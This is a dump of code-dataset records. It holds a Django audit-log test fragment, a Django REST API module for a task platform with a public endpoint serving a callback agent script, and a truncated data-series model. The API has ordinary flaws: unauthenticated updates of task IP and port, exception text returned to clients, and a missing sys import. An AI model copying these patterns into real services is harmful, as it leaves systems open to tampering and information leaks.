{\"headers\": {\"X-Forwarded-For\": \"should ignore\"}}\n\n self.execute_ip_address_test(\n live_server, profile, \"127.0.0.1\", cap_audit_log, request_args\n )\n\n def test_requester_ip_address_is_extracted_from_remote_addr_meta(\n self, live_server, profile, cap_audit_log\n ):\n self.execute_ip_address_test(live_server, profile, \"127.0.0.1\", cap_audit_log)\n", "sub_path": "profiles/tests/test_audit_log.py", "file_name": "test_audit_log.py", "file_ext": "py", "file_size_in_byte": 12292, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.settings.AUDIT_LOGGING_ENABLED", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 30, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 37, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 39, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 65, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 65, "usage_type": "name"}, {"api_name": "open_city_profile.tests.asserts.assert_almost_equal", "line_number": 82, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 84, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 86, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 86, "usage_type": "name"}, {"api_name": "open_city_profile.tests.asserts.assert_almost_equal", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 87, "usage_type": "call"}, {"api_name": "profiles.models.Profile", "line_number": 99, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 100, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 102, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 103, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 97, "usage_type": "name"}, {"api_name": "profiles.models.VerifiedPersonalInformationPermanentAddress", "line_number": 118, "usage_type": "name"}, {"api_name": "profiles.models.VerifiedPersonalInformationTemporaryAddress", "line_number": 119, "usage_type": "name"}, {"api_name": "profiles.models.VerifiedPersonalInformationPermanentForeignAddress", "line_number": 120, "usage_type": "name"}, {"api_name": "factories.VerifiedPersonalInformationFactory", "line_number": 125, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 130, "usage_type": "call"}, {"api_name": "factories.ProfileFactory", "line_number": 132, "usage_type": "name"}, {"api_name": "factories.SensitiveDataFactory", "line_number": 133, "usage_type": "name"}, {"api_name": "profiles.models.VerifiedPersonalInformationPermanentAddress", "line_number": 141, "usage_type": "argument"}, {"api_name": "profiles.models.VerifiedPersonalInformationTemporaryAddress", "line_number": 147, "usage_type": "argument"}, {"api_name": "profiles.models.VerifiedPersonalInformationPermanentForeignAddress", "line_number": 154, "usage_type": "argument"}, {"api_name": "profiles.models.Profile.objects.select_related", "line_number": 191, "usage_type": "call"}, {"api_name": "profiles.models.Profile.objects", "line_number": 191, "usage_type": "attribute"}, {"api_name": "profiles.models.Profile", "line_number": 191, "usage_type": "name"}, {"api_name": "factories.ProfileFactory", "line_number": 261, "usage_type": "call"}, {"api_name": "services.tests.factories.ServiceConnectionFactory", "line_number": 283, "usage_type": "call"}, {"api_name": "open_city_profile.tests.graphql_test_helpers.do_graphql_call_as_user", "line_number": 285, "usage_type": "call"}, {"api_name": "services.tests.factories.ServiceConnectionFactory", "line_number": 298, "usage_type": "call"}, {"api_name": "open_city_profile.tests.graphql_test_helpers.do_graphql_call_as_user", "line_number": 299, "usage_type": "call"}, {"api_name": "factories.ProfileFactory", "line_number": 312, "usage_type": "call"}, {"api_name": "services.tests.factories.ServiceConnectionFactory", "line_number": 314, "usage_type": "call"}, {"api_name": "guardian.shortcuts.assign_perm", "line_number": 316, "usage_type": "call"}, {"api_name": "open_city_profile.tests.graphql_test_helpers.do_graphql_call_as_user", "line_number": 333, "usage_type": "call"}, {"api_name": "open_city_profile.tests.graphql_test_helpers.do_graphql_call_as_user", "line_number": 355, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 363, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 363, "usage_type": "attribute"}, {"api_name": "django.conf.settings.USE_X_FORWARDED_FOR", "line_number": 377, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 377, "usage_type": "name"}]} +{"seq_id": "603818824", "text": "import logging\nfrom django.http import HttpResponse\nfrom django.utils import timezone\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User, Group\nfrom django.conf import settings\nfrom rest_framework.response import Response\nfrom rest_framework import status, serializers, viewsets\nfrom rest_framework.views import APIView\nfrom .utils import format_exception, send_email\nfrom .models import Profile, Task, TaskStatuses\n \n# Setup logging\nlogger = logging.getLogger(__name__)\n\n\n#==============================\n# Common returns\n#==============================\n \n# Ok (with data)\ndef ok200(data=None):\n return Response({\"results\": data}, status=status.HTTP_200_OK)\n \n# Error 400\ndef error400(data=None):\n return Response({\"detail\": data}, status=status.HTTP_400_BAD_REQUEST)\n \n# Error 401\ndef error401(data=None):\n return Response({\"detail\": data}, status=status.HTTP_401_UNAUTHORIZED)\n \n# Error 404\ndef error404(data=None):\n return Response({\"detail\": data}, status=status.HTTP_404_NOT_FOUND)\n \n# Error 500\ndef error500(data=None):\n return Response({\"detail\": data}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n \n#==============================\n# Authentication helper\n#==============================\n \ndef rosetta_authenticate(request):\n\n # Get data\n user = request.user if request.user.is_authenticated else None\n username = request.data.get('username', None)\n password = request.data.get('password', None)\n authtoken = request.data.get('authtoken', None)\n\n # Try standard user authentication\n if user:\n return user\n\n # Try username/password authentication\n elif username or password:\n \n # Check we got both\n if not username:\n return error400('Got empty username')\n if not password:\n return error400('Got empty password')\n \n # Authenticate\n user = authenticate(username=username, password=password)\n if not user:\n return error401('Wrong username/password') \n else:\n login(request, user)\n return user\n\n # Try auth toekn authentication \n elif authtoken:\n try:\n profile = Profile.objects.get(authtoken=authtoken)\n except Profile.DoesNotExist:\n return error400('Wrong auth token')\n login(request, profile.user)\n return profile.user\n else:\n return error401('This is a private API. Login or provide username/password or auth token')\n\n\n\n#==============================\n# Base public API class\n#==============================\n \nclass PublicPOSTAPI(APIView):\n '''Base public POST API class'''\n \n # POST\n def post(self, request):\n try:\n return self._post(request)\n except Exception as e:\n logger.error(format_exception(e))\n return error500('Got error in processing request: {}'.format(e))\n \nclass PublicGETAPI(APIView):\n '''Base public GET API class''' \n # GET\n def get(self, request):\n try:\n return self._get(request)\n except Exception as e:\n logger.error(format_exception(e))\n return error500('Got error in processing request: {}'.format(e))\n\n\n\n#==============================\n# Base private API class\n#==============================\n \nclass PrivatePOSTAPI(APIView):\n '''Base private POST API class'''\n \n # POST\n def post(self, request):\n try:\n # Authenticate using rosetta authentication\n response = rosetta_authenticate(request)\n \n # If we got a response return it, otherwise set it as the user.\n if isinstance(response, Response):\n return response\n else:\n self.user = response\n \n # Call API logic\n return self._post(request)\n except Exception as e:\n logger.error(format_exception(e))\n return error500('Got error in processing request: {}'.format(e))\n \nclass PrivateGETAPI(APIView):\n '''Base private GET API class'''\n\n # GET \n def get(self, request):\n try:\n # Authenticate using rosetta authentication\n response = rosetta_authenticate(request)\n \n # If we got a response return it, otherwise set it as the user.\n if isinstance(response, Response):\n return response\n else:\n self.user = response\n \n # Call API logic\n return self._get(request)\n except Exception as e:\n logger.error(format_exception(e))\n return error500('Got error in processing request: {}'.format(e))\n\n\n\n#==============================\n# User & profile APIs\n#==============================\n\nclass login_api(PrivateGETAPI, PrivatePOSTAPI):\n \"\"\"\n get:\n Returns the auth token.\n\n post:\n Authorize and returns the auth token.\n \"\"\"\n \n def _post(self, request):\n return ok200({'authtoken': self.user.profile.authtoken})\n\n def _get(self, request):\n return ok200({'authtoken': self.user.profile.authtoken}) \n \n \nclass logout_api(PrivateGETAPI):\n \"\"\"\n get:\n Logout the user\n \"\"\"\n \n def _get(self, request):\n logout(request)\n return ok200()\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows Users to be viewed or edited.\n \"\"\"\n\n class UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('url', 'username', 'email', 'groups')\n\n queryset = User.objects.all().order_by('-date_joined') \n serializer_class = UserSerializer\n\n\nclass agent_api(PublicGETAPI):\n \n def _get(self, request):\n \n task_uuid = request.GET.get('task_uuid', None)\n if not task_uuid:\n return HttpResponse('MISSING task_uuid')\n\n from django.core.exceptions import ValidationError\n\n try:\n task = Task.objects.get(uuid=task_uuid)\n except (Task.DoesNotExist, ValidationError):\n return HttpResponse('Unknown task uuid \"{}\"'.format(task_uuid))\n\n\n from.utils import get_webapp_conn_string\n webapp_conn_string = get_webapp_conn_string()\n \n action = request.GET.get('action', None)\n \n if not action:\n # Return the agent code\n agent_code='''\nimport logging\nimport socket\ntry:\n from urllib.request import urlopen\nexcept ImportError:\n from urllib import urlopen\n\n# Setup logging\nlogger = logging.getLogger('Agent')\nlogging.basicConfig(level=logging.INFO)\n\nhostname = socket.gethostname()\n\n# Task id set by the API\ntask_uuid = \"'''+ task_uuid +'''\"\n\n# Log\nlogger.info('Reporting for task uuid: \"{}\"'.format(task_uuid))\n\n# Get IP\nip = socket.gethostbyname(hostname)\nlogger.info(' - ip: \"{}\"'.format(ip))\n\n# Get port\nfrom random import randint\nwhile True:\n\n # Get a random ephimeral port\n port = randint(49152, 65535-2)\n\n # Check port is available\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result1 = sock.connect_ex(('127.0.0.1', port))\n result2 = sock.connect_ex(('127.0.0.1', port+1))\n result3 = sock.connect_ex(('127.0.0.1', port+2))\n if (result1 == 0) or (result2 == 0) or (result3 == 0):\n logger.info('Found not available ephemeral port triplet ({},{},{}) , choosing another one...'.format(port,port+1,port+2))\n import time\n time.sleep(1)\n else:\n break\nlogger.info(' - ports: \"{},{},{}\"'.format(port, port+1, port+2))\n\nresponse = urlopen(\"'''+webapp_conn_string+'''/api/v1/base/agent/?task_uuid={}&action=set_ip_port&ip={}&port={}\".format(task_uuid, ip, port))\nresponse_content = response.read() \nif response_content != 'OK':\n logger.error(response_content)\n logger.info('Not everything OK, exiting with status code =1')\n sys.exit(1)\nelse:\n logger.info('Everything OK')\nprint(port)\n'''\n \n return HttpResponse(agent_code)\n\n\n elif action=='set_ip_port':\n \n task_ip = request.GET.get('ip', None)\n if not task_ip:\n return HttpResponse('IP not valid (got \"{}\")'.format(task_ip))\n \n task_port = request.GET.get('port', None)\n if not task_port:\n return HttpResponse('Port not valid (got \"{}\")'.format(task_port))\n \n try:\n int(task_port)\n except (TypeError, ValueError):\n return HttpResponse('Port not valid (got \"{}\")'.format(task_port))\n \n # Set fields\n logger.info('Setting task \"{}\" to ip \"{}\" and port \"{}\"'.format(task.uuid, task_ip, task_port))\n task.status = TaskStatuses.running\n task.ip = task_ip\n if task.container.supports_dynamic_ports:\n task.port = int(task_port)\n task.save()\n \n # Notify the user that the task called back home\n logger.info('Sending task ready mail notification to \"{}\"'.format(task.user.email))\n mail_subject = 'Your Task \"{}\" is up and running'.format(task.container.name)\n mail_text = 'Hello,\\n\\nyour Task \"{}\" on {} is up and running: {}/tasks/?uuid={}\\n\\nThe Rosetta notifications bot.'.format(task.container.name, task.computing, settings.DJANGO_PUBLIC_HTTP_HOST, task.uuid)\n try:\n send_email(to=task.user.email, subject=mail_subject, text=mail_text)\n except Exception as e:\n logger.error('Cannot send task ready email: \"{}\"'.format(e))\n return HttpResponse('OK')\n \n\n else:\n return HttpResponse('Unknown action \"{}\"'.format(action))\n\n\n\n", "sub_path": "services/webapp/code/rosetta/core_app/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 9800, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 23, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 23, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 27, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 27, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 31, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 35, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 69, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Profile.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "models.Profile.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.Profile", "line_number": 79, "usage_type": "name"}, {"api_name": "models.Profile.DoesNotExist", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Profile", "line_number": 80, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 93, "usage_type": "name"}, {"api_name": "utils.format_exception", "line_number": 101, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 104, "usage_type": "name"}, {"api_name": "utils.format_exception", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 120, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 130, "usage_type": "argument"}, {"api_name": "utils.format_exception", "line_number": 138, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 141, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 151, "usage_type": "argument"}, {"api_name": "utils.format_exception", "line_number": 159, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 191, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 195, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 195, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 200, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 200, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 202, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.all", "line_number": 205, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 205, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 205, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 215, "usage_type": "call"}, {"api_name": "models.Task.objects.get", "line_number": 220, "usage_type": "call"}, {"api_name": "models.Task.objects", "line_number": 220, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 220, "usage_type": "name"}, {"api_name": "models.Task.DoesNotExist", "line_number": 221, "usage_type": "attribute"}, {"api_name": "models.Task", "line_number": 221, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 221, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 222, "usage_type": "call"}, {"api_name": "utils.get_webapp_conn_string", "line_number": 226, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 287, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 294, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 298, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 303, "usage_type": "call"}, {"api_name": "models.TaskStatuses.running", "line_number": 307, "usage_type": "attribute"}, {"api_name": "models.TaskStatuses", "line_number": 307, "usage_type": "name"}, {"api_name": "django.conf.settings.DJANGO_PUBLIC_HTTP_HOST", "line_number": 316, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.send_email", "line_number": 318, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 321, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 325, "usage_type": "call"}]} +{"seq_id": "1244209", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\"\"\"\nData Series\n==========\n\n This module defines L{DataSeries} as the base model for all data series.\n\n Interdependencies\n -----------------\n\n L{DataSeries} may be defined in terms of other L{DataSeries}, thus\n creating a dependency releation, forming a directed, acyclic dependency\n graph among L{DataSeries}. Various operations require traversing this\n dependency graph following the dependencies in one direction or the\n other.\n\n To avoid infinite recursion, circular dependencies are not\n allowed, i.e. no L{DataSeries} that this particular L{DataSeries}\n depends on is allowed to depend on this particular L{DataSeries}. See\n the L{DataSeries.depends_on()} method.\n\"\"\"\n\nfrom fractions import Fraction\nimport itertools\nfrom operator import attrgetter\n\nfrom django.db import models\nfrom django.db.models.query_utils import Q\nfrom django.db.models.query import DateQuerySet\nfrom django.db.models.query import DateTimeQuerySet\nfrom django.db.models.query import ValuesListQuerySet\nfrom django.db.models.query import ValuesQuerySet\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom gridplatform.customers.models import Customer\nfrom gridplatform.encryption.managers import DecryptingManager\nfrom gridplatform.encryption.managers import DecryptingQuerySet\nfrom gridplatform.trackuser import get_customer\nfrom gridplatform.trackuser import get_provider_id\nfrom gridplatform.trackuser import get_user\nfrom gridplatform.trackuser.managers import FilteringQuerySetMixinBase\nfrom gridplatform.utils import condense\nfrom gridplatform.utils import utilitytypes\nfrom gridplatform.utils.fields import BuckinghamField\nfrom gridplatform.utils.iter_ext import count_extended\nfrom gridplatform.utils.iter_ext import pairwise\nfrom gridplatform.utils.iter_ext import pairwise_extended\nfrom gridplatform.utils.models import StoreSubclass\nfrom gridplatform.utils.models import StoredSubclassManager\nfrom gridplatform.utils.samples import Sample\nfrom gridplatform.utils.unitconversion import PhysicalQuantity\nfrom legacy.legacy_utils.preferredunits import get_preferred_unit_converter\n\nfrom ..fields import DataRoleField\nfrom .graph import Graph\n\n\nclass UndefinedSamples(Exception):\n \"\"\"\n Exception raised when samples are supposed to be undefined, even inside the\n domain of a L{DataSeries}.\n\n Some DataSeries are interval aggregates of other DataSeries. These may not\n be well-defined if the requested period is odd-ended or too short: For\n instance if the aggregate is something pr. day and the requested period\n starts and/or ends at something different than a midnight or only spans a\n few hours.\n\n @seealso: L{HeatingDegreeDays} and L{MeanTemperatureChange}.\n \"\"\"\n pass\n\n\nclass DataSeriesQuerySetMixin(FilteringQuerySetMixinBase):\n \"\"\"\n QuerySet limiting result set according to whether the current user is\n allowed to see the customer with specified ID.\n \"\"\"\n\n def _apply_filtering(self):\n user = get_user()\n if user is None:\n return\n if not user.is_authenticated():\n self.query.set_empty()\n return\n customer = get_customer()\n ACCEPTABLE_CUSTOMER_IS_NULL_INDEX_ROLES = [\n DataRoleField.ELECTRICITY_TARIFF,\n DataRoleField.CO2_QUOTIENT,\n ]\n if customer is not None:\n if not customer.is_active:\n self.query.set_empty()\n return\n id_field = '{}_id'.format(self._filter_field)\n kwargs = {id_field: customer.id}\n self.query.add_q(Q(**kwargs) | Q(**{\n '{}__isnull'.format(id_field): True,\n 'role__in': ACCEPTABLE_CUSTOMER_IS_NULL_INDEX_ROLES,\n }))\n return\n provider_id = get_provider_id()\n if provider_id:\n provider_id_field = '{}__provider_id'.format(self._filter_field)\n kwargs = {provider_id_field: provider_id}\n self.query.add_q(Q(**kwargs) | Q(**{\n '{}__isnull'.format(provider_id_field): True,\n 'role__in': ACCEPTABLE_CUSTOMER_IS_NULL_INDEX_ROLES,\n }))\n return\n assert user.is_staff, \\\n 'non-staff user {} without customer or provider; ' + \\\n 'should not exist'.format(user.id)\n return\n\n\nclass DataSeriesManager(DecryptingManager, StoredSubclassManager):\n _field = 'customer'\n use_for_related_fields = True\n\n class _QuerySet(DataSeriesQuerySetMixin, DecryptingQuerySet):\n pass\n\n class _ValuesQuerySet(DataSeriesQuerySetMixin, ValuesQuerySet):\n pass\n\n class _ValuesListQuerySet(DataSeriesQuerySetMixin, ValuesListQuerySet):\n pass\n\n class _DateQuerySet(DataSeriesQuerySetMixin, DateQuerySet):\n pass\n\n class _DateTimeQuerySet(DataSeriesQuerySetMixin, DateTimeQuerySet):\n pass\n\n def get_queryset(self):\n qs = super(DataSeriesManager, self).get_queryset()\n kwargs = {\n 'klass': self._QuerySet,\n '_filter_field': self._field,\n '_ValuesQuerySet': self._ValuesQuerySet,\n '_ValuesListQuerySet': self._ValuesListQuerySet,\n '_DateQuerySet': self._DateQuerySet,\n '_DateTimeQuerySet': self._DateTimeQuerySet,\n }\n return qs._clone(**kwargs)\n\n\nclass DataSeriesBase(models.Model):\n objects = DataSeriesManager()\n\n class Meta:\n abstract = True\n\n\nclass DataSeries(DataSeriesBase, StoreSubclass):\n \"\"\"\n A C{DataSeries} samples an underlying function. Knowing this\n underlying function is important when interpreting and visualizing\n these data.\n\n For instance, if the C{DataSeries} samples an accumulation, you\n will usually want to compare the destilled development of the\n sample values inside a number of similar periods. If the data\n series, on the other hand, samples a rate, it is easy to visualize\n even large sets of undestiled sequential data; for instance with\n upper and lower bounds graphs.\n\n Also, there exist many techniques for interpolating U{continuous\n functions},\n such as U{linear\n interpolation}.\n For discontinuous functions, however, these techniques do not\n apply. Specifically, we will often meet the piecewise constant\n function, where each sample represent the constant value since the\n previous sample (discrete states, mean values and so on).\n\n @cvar PIECEWISE_CONSTANT_ACCUMULATION: Piecewise constant\n accumulation. For example accumulated unit production count.\n\n @cvar PIECEWISE_CONSTANT_RATE: Piecewise constant rate. For\n example mean power.\n\n @cvar CONTINUOUS_ACCUMULATION: Continuous accumulation. For\n example accumulated energy consumption.\n\n @cvar CONTINUOUS_RATE: Continuous rate. For example power,\n temperature, frequency or current.\n\n @cvar INTERVAL_FUNCTION: Interval function, i.e. a function that is\n computed across time intervals and not for any particular point in time;\n i.e. a function that is only well-defined when condensed.\n\n @ivar role: The role of this C{DataSeries} object.\n\n @ivar graph: The graph that this C{DataSeries} belongs to. This\n may be NULL for C{DataSeries} such as L{Index} (it may still be\n rendered to a graph, but its main purpose is not to be drawn on\n any graph in particular).\n\n @ivar customer: A customer which the C{DataSeries} belongs to, if null it's\n a global C{DataSeries} (e.g. a spot tariff or similar).\n\n @ivar utility_type: The type of resource that this C{DataSeries} is\n related to. For non-L{Index} C{DataSeries}, C{utility_type} is genericly\n available through C{graph__collection__resource__type}. I.e. moving the\n field to the L{Index} class would make it impossible to query for all\n DataSeries with a given resource type (and once you figure out how to do\n that anyway, feel free to move the C{utility_type} field to the L{Index}\n class.\n\n You can collect data for similar aspects of different resources, for\n instance energy consumption on both ELECTRICITY and DISTRICT_HEATING, cost\n on everything and temperature in a DISTRICT_HEATING installation. but also\n just room temperature, which is not related to any resource type in\n particular, i.e. UNKNOWN.\n \"\"\"\n customer = models.ForeignKey(Customer, on_delete=models.PROTECT,\n blank=True, null=True, default=get_customer)\n role = DataRoleField()\n\n graph = models.ForeignKey(Graph, on_delete=models.CASCADE,\n null=True, blank=True)\n\n unit = BuckinghamField(blank=True)\n\n utility_type = models.IntegerField(\n _('utility type'), choices=utilitytypes.OPTIONAL_METER_CHOICES)\n\n PIECEWISE_CONSTANT_ACCUMULATION = 0\n PIECEWISE_CONSTANT_RATE = 1\n CONTINUOUS_ACCUMULATION = 2\n CONTINUOUS_RATE = 3\n INTERVAL_FUNCTION = 4\n\n UNDERLYING_FUNCTION_CHOICES = (\n (PIECEWISE_CONSTANT_ACCUMULATION,\n _(u\"Piecewise constant accumulation\")),\n (PIECEWISE_CONSTANT_RATE,\n _(u\"Piecewise constant rate\")),\n (CONTINUOUS_ACCUMULATION,\n _(u\"Continuous accumulation\")),\n (CONTINUOUS_RATE,\n _(u\"Continuous rate\")),\n (INTERVAL_FUNCTION,\n _(u'Interval function')),\n )\n\n class Meta(StoreSubclass.Meta):\n verbose_name = _('dataseries')\n verbose_name_plural = _('dataseries')\n ordering = ['role', 'id']\n app_label = 'measurementpoints'\n\n _exclude_field_from_validation = []\n\n def __unicode__(self):\n if self.subclass.model_class() != self.__class__:\n # This operator is used for ModelChoiceFields, where the queryset\n # does not return concrete instances, but only raw DataSeries\n # instances. If so, delegate to the subclass_instance.\n return unicode(self.subclass_instance)\n elif self.graph and self.graph.collection and self.customer:\n # This is the default implementation for all subclasses.\n return u'{collection_name} -- {role} ({unit})'.format(\n collection_name=self.graph.collection.name_plain,\n role=self.get_role_display(),\n unit=self.get_preferred_unit_converter().get_display_unit())\n else:\n return self.get_role_display()\n\n def get_encryption_id(self):\n return (Customer, self.customer_id)\n\n def get_samples(self, from_timestamp, to_timestamp):\n \"\"\"\n Yields (or returns a list of) raw samples covering the interval\n M{[C{from_timestamp}; C{to_timestamp}]}.\n\n Subclasses that don't store their data directly as StoredData, should\n reimplement the C{_get_samples()} method.\n\n @precondition: C{from_timestamp <= to_timestamp}\n\n @postcondition: For rates, both end-points are included if possible\n through interpolation. If insufficient data is available, nothing is\n yielded/the empty list is returned.\n\n @postcondition: For accumulations, both end-points are included\n (possibly using interpolation or extrapolation). If insufficient data\n is available, nothing is yielded/the empty list is returned.\n\n @postcondition: All yielded samples are contained within the interval.\n\n @postcondition: Each sample yielded represent time after the previously\n yielded sample.\n\n @raise UndefinedSamples: If subclass is not supposed to be defined for\n the particular combination of C{from_timestamp} and C{to_timestamp}.\n \"\"\"\n assert from_timestamp <= to_timestamp\n\n if self.get_underlying_function() == self.INTERVAL_FUNCTION:\n raise UndefinedSamples(\n 'Raw samples for interval functions are not well-defined.')\n\n first_sample = None\n final_sample = None\n previous_timestamp = None\n for sample in self.subclass_instance._get_samples(\n from_timestamp, to_timestamp):\n assert isinstance(sample, Sample), \\\n '%r is not an instance of Sample (self.__class__ == %s)' % (\n sample, self.__class__)\n if first_sample is None:\n first_sample = sample\n elif sample.is_point:\n assert previous_timestamp < sample.timestamp\n elif sample.is_range:\n assert previous_timestamp <= sample.from_timestamp\n\n final_sample = sample\n assert from_timestamp <= sample.from_timestamp, \\\n '%r > %r (self.__class__ == %s)' % (\n from_timestamp, sample.from_timestamp, self.__class__)\n assert to_timestamp >= sample.to_timestamp, \\\n '%r < %r (self.__class__ == %s)' % (\n to_timestamp, sample.to_timestamp, self.__class__)\n yield sample\n\n previous_timestamp = sample.to_timestamp\n\n if self.is_rate() and first_sample is not None and \\\n final_sample is not None:\n assert not first_sample.extrapolated, str(self.__class__)\n assert not final_sample.extrapolated, str(self.__class__)\n\n if self.is_accumulation():\n if first_sample is not None and final_sample is not None:\n assert first_sample.from_timestamp == from_timestamp, str(\n self.__class__)\n assert final_sample.to_timestamp == to_timestamp, str(\n self.__class__)\n\n def _get_samples(self, from_timestamp, to_timestamp):\n \"\"\"\n Yields (or returns a list of) raw samples covering the interval\n M{[C{from_timestamp}; C{to_timestamp}]}.\n\n Subclasses that don't store their data directly as StoredData, should\n reimplement this method.\n\n @precondition: C{from_timestamp <= to_timestamp}\n\n @postcondition: For rates, both end-points are included if possible\n through interpolation. If insufficient data is available, nothing is\n yielded/the empty list is returned.\n\n @postcondition: For accumulations, both end-points are included\n (possibly using interpolation or extrapolation). If insufficient data\n is available, nothing is yielded/the empty list is returned.\n\n @postcondition: All yielded samples are contained within the interval.\n\n @note: The returned samples will be in the time interval\n M{[C{from_timestamp}, C{to_timestamp}]}, where C{from_timestamp} and\n C{to_timestamp} will be linear interpolation values if enough data is\n available.\n \"\"\"\n assert from_timestamp <= to_timestamp\n if self.__class__ != self.subclass.model_class():\n return self.subclass_instance.get_samples(\n from_timestamp, to_timestamp)\n\n tz = from_timestamp.tzinfo\n\n if self.is_continuous():\n dataset = list(self.stored_data.filter(\n timestamp__gte=from_timestamp,\n timestamp__lte=to_timestamp).\n order_by('timestamp'))\n\n result = [\n self.create_point_sample(\n data.timestamp,\n PhysicalQuantity(data.value, self.unit))\n for data in dataset]\n\n # result may be empty if nothing is found in range. Extrapolation\n # is necessary anyway.\n if result:\n if result[0].from_timestamp != from_timestamp:\n first_sample = self._interpolate_extrapolate_sample(\n from_timestamp, data_after=dataset[0])\n if self.is_accumulation() or not first_sample.extrapolated:\n result.insert(0, first_sample)\n if result[-1].to_timestamp != to_timestamp:\n end_sample = self._interpolate_extrapolate_sample(\n to_timestamp, data_before=dataset[-1])\n if self.is_accumulation() or not end_sample.extrapolated:\n result.append(end_sample)\n else:\n first_sample = self._interpolate_extrapolate_sample(\n from_timestamp)\n if first_sample is None or (self.is_rate() and\n first_sample.extrapolated):\n return []\n elif from_timestamp == to_timestamp:\n return [first_sample]\n else:\n end_sample = self._interpolate_extrapolate_sample(\n 